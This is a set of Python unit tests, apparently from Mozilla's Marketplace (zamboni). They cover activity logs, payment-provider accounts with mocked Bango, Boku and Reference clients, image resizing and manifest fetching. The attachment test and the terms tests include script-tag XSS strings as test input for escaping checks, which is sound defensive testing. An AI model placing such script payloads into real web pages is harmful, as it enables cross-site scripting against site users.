eq_(helpers.dev_agreement_ok(self.user), True)
########NEW FILE########
__FILENAME__ = test_models
from datetime import datetime, timedelta
from os import path
from django.core.urlresolvers import NoReverseMatch
from django.test.utils import override_settings
from mock import Mock, patch
from nose.tools import eq_, ok_
import amo
import amo.tests
from addons.models import Addon
from constants.payments import PROVIDER_BANGO, PROVIDER_BOKU
from devhub.models import ActivityLog, ActivityLogAttachment
from users.models import UserProfile
from mkt.developers.models import (AddonPaymentAccount, CantCancel,
PaymentAccount, SolitudeSeller)
from mkt.developers.providers import get_provider
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from .test_providers import Patcher
TEST_PATH = path.dirname(path.abspath(__file__))
ATTACHMENTS_DIR = path.abspath(path.join(TEST_PATH, '..', '..', 'comm',
'tests', 'attachments'))
class TestActivityLogCount(amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'user_2519')
def setUp(self):
now = datetime.now()
bom = datetime(now.year, now.month, 1)
self.lm = bom - timedelta(days=1)
self.user = UserProfile.objects.filter()[0]
amo.set_user(self.user)
def test_not_review_count(self):
amo.log(amo.LOG['EDIT_VERSION'], Webapp.objects.get())
eq_(len(ActivityLog.objects.monthly_reviews()), 0)
def test_review_count(self):
amo.log(amo.LOG['APPROVE_VERSION'], Webapp.objects.get())
result = ActivityLog.objects.monthly_reviews()
eq_(len(result), 1)
eq_(result[0]['approval_count'], 1)
eq_(result[0]['user'], self.user.pk)
def test_review_count_few(self):
for x in range(0, 5):
amo.log(amo.LOG['APPROVE_VERSION'], Webapp.objects.get())
result = ActivityLog.objects.monthly_reviews()
eq_(len(result), 1)
eq_(result[0]['approval_count'], 5)
def test_review_last_month(self):
log = amo.log(amo.LOG['APPROVE_VERSION'], Webapp.objects.get())
log.update(created=self.lm)
eq_(len(ActivityLog.objects.monthly_reviews()), 0)
def test_not_total(self):
amo.log(amo.LOG['EDIT_VERSION'], Webapp.objects.get())
eq_(len(ActivityLog.objects.total_reviews()), 0)
def test_total_few(self):
for x in range(0, 5):
amo.log(amo.LOG['APPROVE_VERSION'], Webapp.objects.get())
result = ActivityLog.objects.total_reviews()
eq_(len(result), 1)
eq_(result[0]['approval_count'], 5)
def test_total_last_month(self):
log = amo.log(amo.LOG['APPROVE_VERSION'], Webapp.objects.get())
log.update(created=self.lm)
result = ActivityLog.objects.total_reviews()
eq_(len(result), 1)
eq_(result[0]['approval_count'], 1)
eq_(result[0]['user'], self.user.pk)
def test_log_admin(self):
amo.log(amo.LOG['OBJECT_EDITED'], Webapp.objects.get())
eq_(len(ActivityLog.objects.admin_events()), 1)
eq_(len(ActivityLog.objects.for_developer()), 0)
def test_log_not_admin(self):
amo.log(amo.LOG['EDIT_VERSION'], Webapp.objects.get())
eq_(len(ActivityLog.objects.admin_events()), 0)
eq_(len(ActivityLog.objects.for_developer()), 1)
class TestPaymentAccount(Patcher, amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'user_999')
def setUp(self):
self.user = UserProfile.objects.filter()[0]
self.seller, self.solsel = self.create_solitude_seller()
super(TestPaymentAccount, self).setUp()
def create_solitude_seller(self, **kwargs):
solsel_patcher = patch('mkt.developers.models.SolitudeSeller.create')
solsel = solsel_patcher.start()
seller_params = {'resource_uri': 'selleruri', 'user': self.user}
seller_params.update(kwargs)
seller = SolitudeSeller.objects.create(**seller_params)
solsel.return_value = seller
solsel.patcher = solsel_patcher
return seller, solsel
def tearDown(self):
self.solsel.patcher.stop()
super(TestPaymentAccount, self).tearDown()
def test_create_bango(self):
# Return a seller object without hitting Bango.
self.bango_patcher.package.post.return_value = {
'resource_uri': 'zipzap',
'package_id': 123,
}
res = get_provider().account_create(
self.user, {'account_name': 'Test Account'})
eq_(res.name, 'Test Account')
eq_(res.user, self.user)
eq_(res.seller_uri, 'selleruri')
eq_(res.account_id, 123)
eq_(res.uri, 'zipzap')
self.bango_patcher.package.post.assert_called_with(
data={'paypalEmailAddress': '[email protected]',
'seller': 'selleruri'})
self.bango_patcher.bank.post.assert_called_with(
data={'seller_bango': 'zipzap'})
def test_cancel(self):
res = PaymentAccount.objects.create(
name='asdf', user=self.user, uri='foo', seller_uri='uri1',
solitude_seller=self.seller)
addon = Addon.objects.get()
AddonPaymentAccount.objects.create(
addon=addon, account_uri='foo',
payment_account=res, product_uri='bpruri')
assert addon.reload().status != amo.STATUS_NULL
res.cancel(disable_refs=True)
assert res.inactive
assert addon.reload().status == amo.STATUS_NULL
assert not AddonPaymentAccount.objects.exists()
def test_cancel_shared(self):
res = PaymentAccount.objects.create(
name='asdf', user=self.user, uri='foo',
solitude_seller=self.seller, shared=True)
addon = Addon.objects.get()
AddonPaymentAccount.objects.create(
addon=addon, account_uri='foo',
payment_account=res, product_uri='bpruri')
with self.assertRaises(CantCancel):
res.cancel()
def test_cancel_multiple_accounts(self):
acct1 = PaymentAccount.objects.create(
name='asdf', user=self.user, uri='foo', seller_uri='uri1',
solitude_seller=self.seller, provider=PROVIDER_BANGO)
acct2 = PaymentAccount.objects.create(
name='fdsa', user=self.user, uri='bar', seller_uri='uri2',
solitude_seller=self.seller, provider=PROVIDER_BOKU)
addon = Addon.objects.get(pk=337141)
AddonPaymentAccount.objects.create(
addon=addon, account_uri='foo',
payment_account=acct1, product_uri='bpruri')
still_around = AddonPaymentAccount.objects.create(
addon=addon, account_uri='bar',
payment_account=acct2, product_uri='asiuri')
ok_(addon.reload().status != amo.STATUS_NULL)
acct1.cancel(disable_refs=True)
ok_(acct1.inactive)
ok_(addon.reload().status != amo.STATUS_NULL)
pks = AddonPaymentAccount.objects.values_list('pk', flat=True)
eq_(len(pks), 1)
eq_(pks[0], still_around.pk)
def test_get_details(self):
package = Mock()
package.get.return_value = {'full': {'vendorName': 'a',
'some_other_value': 'b'}}
self.bango_patcher.package.return_value = package
res = PaymentAccount.objects.create(
name='asdf', user=self.user, uri='/foo/bar/123',
solitude_seller=self.seller)
deets = res.get_provider().account_retrieve(res)
eq_(deets['account_name'], res.name)
eq_(deets['vendorName'], 'a')
assert 'some_other_value' not in deets
self.bango_patcher.package.assert_called_with('123')
package.get.assert_called_with(data={'full': True})
def test_update_account_details(self):
res = PaymentAccount.objects.create(
name='asdf', user=self.user, uri='foo',
solitude_seller=self.seller)
res.get_provider().account_update(res, {
'account_name': 'new name',
'vendorName': 'new vendor name',
'something_other_value': 'not a package key'
})
eq_(res.name, 'new name')
self.bango_patcher.api.by_url(res.uri).patch.assert_called_with(
data={'vendorName': 'new vendor name'})
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
class TestActivityLogAttachment(amo.tests.TestCase):
fixtures = ['base/addon_3615']
XSS_STRING = 'MMM <script>alert(bacon);</script>'
def setUp(self):
self.user = self._user()
addon = Addon.objects.get()
version = addon.latest_version
al = amo.log(amo.LOG.COMMENT_VERSION, addon, version, user=self.user)
self.attachment1, self.attachment2 = self._attachments(al)
def tearDown(self):
amo.set_user(None)
def _user(self):
"""Create and return a user"""
u = UserProfile.objects.create(username='porkbelly')
amo.set_user(u)
return u
def _attachments(self, activity_log):
"""
Create and return a tuple of ActivityLogAttachment instances.
"""
ala1 = ActivityLogAttachment.objects.create(
activity_log=activity_log, filepath='bacon.txt',
mimetype='text/plain')
ala2 = ActivityLogAttachment.objects.create(
activity_log=activity_log, filepath='bacon.jpg',
description=self.XSS_STRING, mimetype='image/jpeg')
return ala1, ala2
def test_filename(self):
msg = ('ActivityLogAttachment().filename() returning '
'incorrect filename.')
eq_(self.attachment1.filename(), 'bacon.txt', msg)
eq_(self.attachment2.filename(), 'bacon.jpg', msg)
def test_full_path_dirname(self):
msg = ('ActivityLogAttachment().full_path() returning incorrect path.')
FAKE_PATH = '/tmp/attachments/'
with self.settings(REVIEWER_ATTACHMENTS_PATH=FAKE_PATH):
eq_(self.attachment1.full_path(), FAKE_PATH + 'bacon.txt', msg)
eq_(self.attachment2.full_path(), FAKE_PATH + 'bacon.jpg', msg)
def test_display_name(self):
msg = ('ActivityLogAttachment().display_name() returning '
'incorrect display name.')
eq_(self.attachment1.display_name(), 'bacon.txt', msg)
def test_display_name_xss(self):
self.assertNotIn('<script>', self.attachment2.display_name())
def test_is_image(self):
msg = ('ActivityLogAttachment().is_image() not correctly detecting '
'images.')
eq_(self.attachment1.is_image(), False, msg)
eq_(self.attachment2.is_image(), True, msg)
def test_get_absolute_url(self):
msg = ('ActivityLogAttachment().get_absolute_url() raising a '
'NoReverseMatch exception.')
try:
self.attachment1.get_absolute_url()
self.attachment2.get_absolute_url()
except NoReverseMatch:
assert False, msg
########NEW FILE########
__FILENAME__ = test_providers
from datetime import datetime
from django.core.exceptions import ObjectDoesNotExist
from mock import ANY, Mock, patch
from nose.tools import eq_, ok_, raises
from amo.tests import app_factory, TestCase
from constants.payments import (PROVIDER_BANGO, PROVIDER_BOKU,
PROVIDER_REFERENCE)
from mkt.developers.models import PaymentAccount, SolitudeSeller
from mkt.developers.providers import (account_check, Bango, Boku, get_provider,
Reference)
from mkt.site.fixtures import fixture
from users.models import UserProfile
class Patcher(object):
"""
This class patch your test case so that any attempt to call solitude
from zamboni through these classes will use the mock.
Use this class as mixin on any tests that alter payment accounts.
If you override setUp or tearDown be sure to call super.
"""
def setUp(self, *args, **kw):
super(Patcher, self).setUp(*args, **kw)
# Once everything has moved over to the provider, this one
# can be remoed.
client_patcher = patch('mkt.developers.models.client',
name='test_providers.Patcher.client_patcher')
self.patched_client = client_patcher.start()
self.patched_client.patcher = client_patcher
self.addCleanup(client_patcher.stop)
bango_patcher = patch('mkt.developers.providers.Bango.client',
name='test_providers.Patcher.bango_patcher')
self.bango_patcher = bango_patcher.start()
self.bango_patcher.patcher = bango_patcher
self.addCleanup(bango_patcher.stop)
bango_p_patcher = patch(
'mkt.developers.providers.Bango.client_provider',
name='test_providers.Patcher.bango_p_patcher')
self.bango_p_patcher = bango_p_patcher.start()
self.bango_p_patcher.patcher = bango_p_patcher
self.addCleanup(bango_p_patcher.stop)
boku_patcher = patch('mkt.developers.providers.Boku.client',
name='test_providers.Patcher.boku_patcher')
self.boku_patcher = boku_patcher.start()
self.boku_patcher.patcher = boku_patcher
self.addCleanup(boku_patcher.stop)
ref_patcher = patch('mkt.developers.providers.Reference.client',
name='test_providers.Patcher.ref_patcher')
self.ref_patcher = ref_patcher.start()
self.ref_patcher.patcher = ref_patcher
self.addCleanup(ref_patcher.stop)
generic_patcher = patch('mkt.developers.providers.Provider.generic',
name='test_providers.Patcher.generic_patcher')
self.generic_patcher = generic_patcher.start()
self.generic_patcher.patcher = generic_patcher
self.addCleanup(generic_patcher.stop)
class TestSetup(TestCase):
def test_multiple(self):
with self.settings(PAYMENT_PROVIDERS=['bango', 'reference'],
DEFAULT_PAYMENT_PROVIDER='bango'):
eq_(get_provider().name, 'bango')
class TestBase(TestCase):
def test_check(self):
provider = Reference()
@account_check
def test(self, account):
pass
provider.test = test
provider.test(provider, PaymentAccount(provider=PROVIDER_REFERENCE))
with self.assertRaises(ValueError):
provider.test(provider, PaymentAccount(provider=PROVIDER_BOKU))
class TestBango(Patcher, TestCase):
fixtures = fixture('user_999')
def setUp(self):
super(TestBango, self).setUp()
self.user = UserProfile.objects.filter()[0]
self.app = app_factory()
self.make_premium(self.app)
self.seller = SolitudeSeller.objects.create(
resource_uri='sellerres', user=self.user
)
self.account = PaymentAccount.objects.create(
solitude_seller=self.seller,
user=self.user, name='paname', uri='acuri',
inactive=False, seller_uri='selluri',
account_id=123, provider=PROVIDER_BANGO
)
self.bango = Bango()
def test_create(self):
self.generic_patcher.product.get_object_or_404.return_value = {
'resource_uri': 'gpuri'}
self.bango_patcher.product.get_object_or_404.return_value = {
'resource_uri': 'bpruri', 'bango_id': 'bango#', 'seller': 'selluri'
}
uri = self.bango.product_create(self.account, self.app)
eq_(uri, 'bpruri')
def test_create_new(self):
self.bango_patcher.product.get_object_or_404.side_effect = (
ObjectDoesNotExist)
self.bango_p_patcher.product.post.return_value = {
'resource_uri': '', 'bango_id': 1
}
self.bango.product_create(self.account, self.app)
ok_('packageId' in
self.bango_p_patcher.product.post.call_args[1]['data'])
def test_terms_bleached(self):
self.bango_patcher.sbi.agreement.get_object.return_value = {
'text': '<script>foo</script><h3></h3>'}
eq_(self.bango.terms_retrieve(Mock())['text'],
u'<script>foo</script><h3></h3>')
class TestReference(Patcher, TestCase):
fixtures = fixture('user_999')
def setUp(self, *args, **kw):
super(TestReference, self).setUp(*args, **kw)
self.user = UserProfile.objects.get(pk=999)
self.ref = Reference()
def test_setup_seller(self):
self.ref.setup_seller(self.user)
ok_(SolitudeSeller.objects.filter(user=self.user).exists())
def test_account_create(self):
data = {'account_name': 'account', 'name': 'f', 'email': '[email protected]'}
res = self.ref.account_create(self.user, data)
acct = PaymentAccount.objects.get(user=self.user)
eq_(acct.provider, PROVIDER_REFERENCE)
eq_(res.pk, acct.pk)
self.ref_patcher.sellers.post.assert_called_with(data={
'status': 'ACTIVE',
'email': '[email protected]',
'uuid': ANY,
'name': 'f',
})
def make_account(self):
seller = SolitudeSeller.objects.create(user=self.user)
return PaymentAccount.objects.create(user=self.user,
solitude_seller=seller,
uri='/f/b/1',
name='account name',
provider=PROVIDER_REFERENCE)
def test_terms_retrieve(self):
account = self.make_account()
self.ref.terms_retrieve(account)
assert self.ref_patcher.terms.called
def test_terms_bleached(self):
account = self.make_account()
account_mock = Mock()
account_mock.get.return_value = {'text':
'<script>foo</script><a>bar</a>'}
self.ref_patcher.terms.return_value = account_mock
eq_(self.ref.terms_retrieve(account)['text'],
u'<script>foo</script><a>bar</a>')
def test_terms_update(self):
seller_mock = Mock()
seller_mock.get.return_value = {
'id': 1,
'resource_uri': '/a/b/c',
'resource_name': 'x',
'initial_field': u'initial content',
}
seller_mock.put.return_value = {}
self.ref_patcher.sellers.return_value = seller_mock
account = self.make_account()
self.ref.terms_update(account)
eq_(account.reload().agreed_tos, True)
assert self.ref_patcher.sellers.called
seller_mock.get.assert_called_with()
seller_mock.put.assert_called_with({
'agreement': datetime.now().strftime('%Y-%m-%d'),
'initial_field': u'initial content',
})
def test_account_retrieve(self):
account = self.make_account()
acc = self.ref.account_retrieve(account)
eq_(acc, {'account_name': 'account name'})
assert self.ref_patcher.sellers.called
def test_account_update(self):
account_data = {
'status': '',
'resource_name': 'sellers',
'uuid': 'custom-uuid',
'agreement': '',
'email': '[email protected]',
'id': 'custom-uuid',
'resource_uri': '/provider/reference/sellers/custom-uuid/',
'account_name': u'Test',
'name': 'Test',
}
seller_mock = Mock()
seller_mock.get.return_value = account_data
self.ref_patcher.sellers.return_value = seller_mock
account = self.make_account()
self.ref.account_update(account, account_data)
eq_(self.ref.forms['account']().hidden_fields()[0].name, 'uuid')
eq_(account.reload().name, 'Test')
seller_mock.put.assert_called_with(account_data)
def test_product_create_exists(self):
self.ref_patcher.products.get.return_value = [{'resource_uri': '/f'}]
account = self.make_account()
app = app_factory()
self.ref.product_create(account, app)
# Product should have been got from zippy, but not created by a post.
assert self.ref_patcher.products.get.called
@raises(ValueError)
def test_product_mulitple(self):
self.ref_patcher.products.get.return_value = [{}, {}]
account = self.make_account()
app = app_factory()
self.ref.product_create(account, app)
def test_product_create_not(self):
self.generic_patcher.product.get_object_or_404.return_value = {
'external_id': 'ext'}
self.ref_patcher.products.get.return_value = []
self.ref_patcher.products.post.return_value = {'resource_uri': '/f'}
account = self.make_account()
app = app_factory()
self.ref.product_create(account, app)
self.ref_patcher.products.get.assert_called_with(
seller_id='1', external_id='ext')
self.ref_patcher.products.post.assert_called_with(data={
'seller_id': '1',
'external_id': 'ext',
'name': unicode(app.name),
'uuid': ANY,
})
class TestBoku(Patcher, TestCase):
fixtures = fixture('user_999')
def setUp(self, *args, **kw):
super(TestBoku, self).setUp(*args, **kw)
self.user = UserProfile.objects.get(pk=999)
self.boku = Boku()
def make_account(self):
seller = SolitudeSeller.objects.create(user=self.user)
return PaymentAccount.objects.create(user=self.user,
solitude_seller=seller,
uri='/f/b/1',
name='account name',
provider=PROVIDER_BOKU)
def test_account_create(self):
data = {'account_name': 'account',
'service_id': 'b'}
res = self.boku.account_create(self.user, data)
acct = PaymentAccount.objects.get(user=self.user)
eq_(acct.provider, PROVIDER_BOKU)
eq_(acct.agreed_tos, True)
eq_(res.pk, acct.pk)
self.boku_patcher.seller.post.assert_called_with(data={
'seller': ANY,
'service_id': 'b',
})
def test_terms_update(self):
account = self.make_account()
assert not account.agreed_tos
response = self.boku.terms_update(account)
assert account.agreed_tos
assert response['accepted']
def test_create_new_product(self):
account = self.make_account()
app = app_factory()
generic_product_uri = '/generic/product/1/'
boku_product_uri = '/boku/product/1/'
self.generic_patcher.product.get_object_or_404.return_value = {
'resource_pk': 1,
'resource_uri': generic_product_uri,
}
self.boku_patcher.product.get.return_value = {
'meta': {'total_count': 0},
'objects': [],
}
self.boku_patcher.product.post.return_value = {
'resource_uri': boku_product_uri,
'seller_product': generic_product_uri,
'seller_boku': account.uri,
}
product = self.boku.product_create(account, app)
eq_(product, boku_product_uri)
self.boku_patcher.product.post.assert_called_with(data={
'seller_boku': account.uri,
'seller_product': generic_product_uri,
})
def test_update_existing_product(self):
account = self.make_account()
app = app_factory()
generic_product_uri = '/generic/product/1/'
self.generic_patcher.product.get_object_or_404.return_value = {
'resource_pk': 1,
'resource_uri': generic_product_uri,
}
existing_boku_product_uri = '/boku/product/1/'
self.boku_patcher.product.get.return_value = {
'meta': {'total_count': 1},
'objects': [{
'resource_uri': existing_boku_product_uri,
}],
}
patch_mock = Mock()
patch_mock.patch.return_value = {
'resource_uri': existing_boku_product_uri,
'seller_product': generic_product_uri,
'seller_boku': account.uri,
}
self.boku_patcher.by_url.return_value = patch_mock
product = self.boku.product_create(account, app)
eq_(product, existing_boku_product_uri)
self.boku_patcher.by_url.assert_called_with(existing_boku_product_uri)
patch_mock.patch.assert_called_with(data={
'seller_boku': account.uri,
'seller_product': generic_product_uri,
})
def test_multiple_existing_products_raises_exception(self):
account = self.make_account()
app = app_factory()
generic_product_uri = '/generic/product/1/'
self.generic_patcher.product.get_object_or_404.return_value = {
'resource_pk': 1,
'resource_uri': generic_product_uri,
}
self.boku_patcher.product.get.return_value = {
'meta': {'total_count': 2},
'objects': [],
}
with self.assertRaises(ValueError):
self.boku.product_create(account, app)
########NEW FILE########
__FILENAME__ = test_tasks
import codecs
import json
import os
import shutil
import socket
import tempfile
import urllib2
from cStringIO import StringIO
from contextlib import contextmanager
from django.conf import settings
from django.core import mail
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
import mock
from nose.tools import eq_
from PIL import Image, ImageChops
from requests import RequestException
import amo
import amo.tests
import mkt
from addons.models import Preview
from amo.tests.test_helpers import get_image_path
from amo.utils import ImageCheck
from files.models import FileUpload
from mkt.developers import tasks
from mkt.site.fixtures import fixture
from mkt.submit.tests.test_views import BaseWebAppTest
from mkt.webapps.models import AddonExcludedRegion as AER, Webapp
def test_resize_icon_shrink():
""" Image should be shrunk so that the longest side is 32px. """
resize_size = [32]
final_size = [(32, 12)]
_uploader(resize_size, final_size)
def test_resize_icon_enlarge():
""" Image stays the same, since the new size is bigger than both sides. """
resize_size = [1000]
final_size = [(339, 128)]
_uploader(resize_size, final_size)
def test_resize_icon_same():
""" Image stays the same, since the new size is the same. """
resize_size = [339]
final_size = [(339, 128)]
_uploader(resize_size, final_size)
def test_resize_icon_list():
""" Resize multiple images at once. """
resize_size = [32, 82, 100]
final_size = [(32, 12), (82, 30), (100, 37)]
_uploader(resize_size, final_size)
def _uploader(resize_size, final_size):
img = get_image_path('mozilla.png')
original_size = (339, 128)
for rsize, fsize in zip(resize_size, final_size):
dest_name = os.path.join(settings.ADDON_ICONS_PATH, '1234')
src = tempfile.NamedTemporaryFile(mode='r+w+b', suffix='.png',
delete=False)
# resize_icon removes the original, copy it to a tempfile and use that.
shutil.copyfile(img, src.name)
# Sanity check.
with storage.open(src.name) as fp:
src_image = Image.open(fp)
src_image.load()
eq_(src_image.size, original_size)
val = tasks.resize_icon(src.name, dest_name, resize_size, locally=True)
eq_(val, {'icon_hash': 'bb362450'})
with storage.open('%s-%s.png' % (dest_name, rsize)) as fp:
dest_image = Image.open(fp)
dest_image.load()
# Assert that the width is always identical.
eq_(dest_image.size[0], fsize[0])
# Assert that the height can be a wee bit fuzzy.
assert -1 <= dest_image.size[1] - fsize[1] <= 1, (
'Got width %d, expected %d' %
(fsize[1], dest_image.size[1]))
if os.path.exists(dest_image.filename):
os.remove(dest_image.filename)
assert not os.path.exists(dest_image.filename)
assert not os.path.exists(src.name)
class TestPngcrushImage(amo.tests.TestCase):
def setUp(self):
img = get_image_path('mozilla.png')
self.src = tempfile.NamedTemporaryFile(mode='r+w+b', suffix=".png",
delete=False)
shutil.copyfile(img, self.src.name)
def tearDown(self):
os.remove(self.src.name)
def test_pngcrush_image_is_optimized(self):
src_crushed = tempfile.NamedTemporaryFile(mode='r+w+b', suffix=".png",
delete=False)
shutil.copyfile(self.src.name, src_crushed.name)
rval = tasks.pngcrush_image(src_crushed.name)
eq_(rval, True)
crushed_size = os.path.getsize(src_crushed.name)
orig_size = os.path.getsize(self.src.name)
assert crushed_size < orig_size
orig_image = Image.open(self.src.name)
crushed_image = Image.open(src_crushed.name)
eq_(ImageChops.difference(crushed_image, orig_image).getbbox(), None)
os.remove(src_crushed.name)
class TestValidator(amo.tests.TestCase):
def setUp(self):
self.upload = FileUpload.objects.create()
assert not self.upload.valid
def get_upload(self):
return FileUpload.objects.get(pk=self.upload.pk)
@mock.patch('mkt.developers.tasks.run_validator')
def test_pass_validation(self, _mock):
_mock.return_value = '{"errors": 0}'
tasks.validator(self.upload.pk)
assert self.get_upload().valid
@mock.patch('mkt.developers.tasks.run_validator')
def test_fail_validation(self, _mock):
_mock.return_value = '{"errors": 2}'
tasks.validator(self.upload.pk)
assert not self.get_upload().valid
@mock.patch('mkt.developers.tasks.run_validator')
def test_validation_error(self, _mock):
_mock.side_effect = Exception
eq_(self.upload.task_error, None)
with self.assertRaises(Exception):
tasks.validator(self.upload.pk)
error = self.get_upload().task_error
assert error is not None
assert error.startswith('Traceback (most recent call last)'), error
@mock.patch('mkt.developers.tasks.validate_app')
@mock.patch('mkt.developers.tasks.storage.open')
def test_validate_manifest(self, _open, _mock):
self.get_upload().update(is_webapp=True)
_open.return_value = StringIO('')
_mock.return_value = '{"errors": 0}'
tasks.validator(self.upload.pk)
assert _mock.called
@mock.patch('mkt.developers.tasks.validate_packaged_app')
@mock.patch('zipfile.is_zipfile')
def test_validate_packaged_app(self, _zipfile, _mock):
self.get_upload().update(is_webapp=True)
_zipfile.return_value = True
_mock.return_value = '{"errors": 0}'
tasks.validator(self.upload.pk)
assert _mock.called
storage_open = storage.open
def _mock_hide_64px_icon(path, *args, **kwargs):
"""
A function that mocks `storage.open` and throws an IOError if you try to
open a 128x128px icon.
"""
if '128' in path:
raise IOError('No 128px icon for you!')
return storage_open(path, *args, **kwargs)
@override_settings(
PREVIEW_FULL_PATH='/tmp/uploads-tests/previews/full/%s/%d.%s',
PREVIEW_THUMBNAIL_PATH='/tmp/uploads-tests/previews/thumbs/%s/%d.png')
class TestResizePreview(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
# Make sure there are no leftover files in the test directory before
# launching tests that depend on the files presence/absence.
shutil.rmtree('/tmp/uploads-tests/previews/', ignore_errors=True)
def test_preview(self):
addon = Webapp.objects.get(pk=337141)
preview = Preview.objects.create(addon=addon)
src = get_image_path('preview.jpg')
tasks.resize_preview(src, preview)
preview = preview.reload()
eq_(preview.image_size, [400, 533])
eq_(preview.thumbnail_size, [100, 133])
eq_(preview.is_landscape, False)
with storage.open(preview.thumbnail_path) as fp:
im = Image.open(fp)
eq_(list(im.size), [100, 133])
with storage.open(preview.image_path) as fp:
im = Image.open(fp)
eq_(list(im.size), [400, 533])
def test_preview_rotated(self):
addon = Webapp.objects.get(pk=337141)
preview = Preview.objects.create(addon=addon)
src = get_image_path('preview_landscape.jpg')
tasks.resize_preview(src, preview)
preview = preview.reload()
eq_(preview.image_size, [533, 400])
eq_(preview.thumbnail_size, [133, 100])
eq_(preview.is_landscape, True)
with storage.open(preview.thumbnail_path) as fp:
im = Image.open(fp)
eq_(list(im.size), [133, 100])
with storage.open(preview.image_path) as fp:
im = Image.open(fp)
eq_(list(im.size), [533, 400])
def test_preview_dont_generate_image(self):
addon = Webapp.objects.get(pk=337141)
preview = Preview.objects.create(addon=addon)
src = get_image_path('preview.jpg')
tasks.resize_preview(src, preview, generate_image=False)
preview = preview.reload()
eq_(preview.image_size, [])
eq_(preview.thumbnail_size, [100, 133])
eq_(preview.sizes, {u'thumbnail': [100, 133]})
with storage.open(preview.thumbnail_path) as fp:
im = Image.open(fp)
eq_(list(im.size), [100, 133])
assert not os.path.exists(preview.image_path), preview.image_path
class TestFetchManifest(amo.tests.TestCase):
def setUp(self):
self.upload = FileUpload.objects.create()
self.content_type = 'application/x-web-app-manifest+json'
patcher = mock.patch('mkt.developers.tasks.requests.get')
self.requests_mock = patcher.start()
self.addCleanup(patcher.stop)
def get_upload(self):
return FileUpload.objects.get(pk=self.upload.pk)
def file(self, name):
return os.path.join(os.path.dirname(__file__), 'addons', name)
@contextmanager
def patch_requests(self):
response_mock = mock.Mock(status_code=200)
response_mock.iter_content.return_value = mock.Mock(
next=lambda: '<default>')
response_mock.headers = {'content-type': self.content_type}
yield response_mock
self.requests_mock.return_value = response_mock
@mock.patch('mkt.developers.tasks.validator')
def test_success_add_file(self, validator_mock):
with self.patch_requests() as ur:
ur.iter_content.return_value = mock.Mock(next=lambda: 'woo')
tasks.fetch_manifest('http://xx.com/manifest.json', self.upload.pk)
upload = FileUpload.objects.get(pk=self.upload.pk)
eq_(upload.name, 'http://xx.com/manifest.json')
eq_(upload.is_webapp, True)
eq_(storage.open(upload.path).read(), 'woo')
@mock.patch('mkt.developers.tasks.validator')
def test_success_call_validator(self, validator_mock):
with self.patch_requests() as ur:
ct = self.content_type + '; charset=utf-8'
ur.headers = {'content-type': ct}
tasks.fetch_manifest('http://xx.com/manifest.json', self.upload.pk)
assert validator_mock.called
def check_validation(self, msg=''):
upload = self.get_upload()
if msg:
validation = json.loads(upload.validation)
eq_([m['message'] for m in validation['messages']], [msg])
eq_(validation['errors'], 1)
eq_(validation['success'], False)
eq_(len(validation['messages']), 1)
else:
validation_output = upload.validation
if not validation_output:
return
validation = json.loads(validation_output)
assert not validation['messages']
eq_(validation['errors'], 0)
eq_(validation['success'], True)
def test_connection_error(self):
reason = socket.gaierror(8, 'nodename nor servname provided')
self.requests_mock.side_effect = RequestException(reason)
tasks.fetch_manifest('url', self.upload.pk)
self.check_validation(
'No manifest was found at that URL. Check the address and try '
'again.')
def test_url_timeout(self):
reason = socket.timeout('too slow')
self.requests_mock.side_effect = RequestException(reason)
tasks.fetch_manifest('url', self.upload.pk)
self.check_validation(
'No manifest was found at that URL. Check the address and try '
'again.')
def test_other_url_error(self):
reason = Exception('Some other failure.')
self.requests_mock.side_effect = RequestException(reason)
tasks.fetch_manifest('url', self.upload.pk)
self.check_validation(
'No manifest was found at that URL. Check the address and try '
'again.')
@mock.patch('mkt.developers.tasks.validator', lambda uid, **kw: None)
def test_no_content_type(self):
with self.patch_requests() as ur:
ur.headers = {}
tasks.fetch_manifest('url', self.upload.pk)
self.check_validation(
'No manifest was found at that URL. Check the address and try '
'again.')
@mock.patch('mkt.developers.tasks.validator', lambda uid, **kw: None)
def test_bad_content_type(self):
with self.patch_requests() as ur:
ur.headers = {'Content-Type': 'x'}
tasks.fetch_manifest('url', self.upload.pk)
self.check_validation(
'Manifests must be served with the HTTP header "Content-Type: '
'application/x-web-app-manifest+json". See %s for more '
'information.' % tasks.CT_URL)
@mock.patch('mkt.developers.tasks.validator', lambda uid, **kw: None)
def test_good_charset(self):
with self.patch_requests() as ur:
ur.headers = {
'content-type': 'application/x-web-app-manifest+json;'
'charset=utf-8'
}
tasks.fetch_manifest('url', self.upload.pk)
self.check_validation()
@mock.patch('mkt.developers.tasks.validator', lambda uid, **kw: None)
def test_bad_charset(self):
with self.patch_requests() as ur:
ur.headers = {
'content-type': 'application/x-web-app-manifest+json;'
'charset=ISO-1234567890-LOL'
}
tasks.fetch_manifest('url', self.upload.pk)
self.check_validation("The manifest's encoding does not match the "
'charset provided in the HTTP Content-Type.')
def test_response_too_large(self):
with self.patch_requests() as ur:
content = 'x' * (settings.MAX_WEBAPP_UPLOAD_SIZE + 1)
ur.iter_content.return_value = mock.Mock(next=lambda: content)
tasks.fetch_manifest('url', self.upload.pk)
max_webapp_size = settings.MAX_WEBAPP_UPLOAD_SIZE
self.check_validation('Your manifest must be less than %s bytes.' %
max_webapp_size)
def test_http_error(self):
self.requests_mock.side_effect = urllib2.HTTPError(
'url', 404, 'Not Found', [], None)
tasks.fetch_manifest('url', self.upload.pk)
self.check_validation(
'No manifest was found at that URL. Check the address and try '
'again.')
def test_strip_utf8_bom(self):
with self.patch_requests() as ur:
with open(self.file('utf8bom.webapp')) as fp:
content = fp.read()
ur.iter_content.return_value = mock.Mock(next=lambda: content)
tasks.fetch_manifest('url', self.upload.pk)
# Should not be called with anything else (e.g., `decode_unicode`).
ur.iter_content.assert_called_with(
chunk_size=settings.MAX_WEBAPP_UPLOAD_SIZE + 1)
upload = self.get_upload()
with storage.open(upload.path, 'rb') as fp:
manifest = fp.read()
json.loads(manifest) # No parse error.
assert not manifest.startswith(codecs.BOM_UTF8)
def test_non_utf8_encoding(self):
with self.patch_requests() as ur:
with open(self.file('utf8bom.webapp')) as fp:
# Set encoding to utf16 which will be invalid.
content = fp.read().decode('utf8').encode('utf16')
ur.iter_content.return_value = mock.Mock(next=lambda: content)
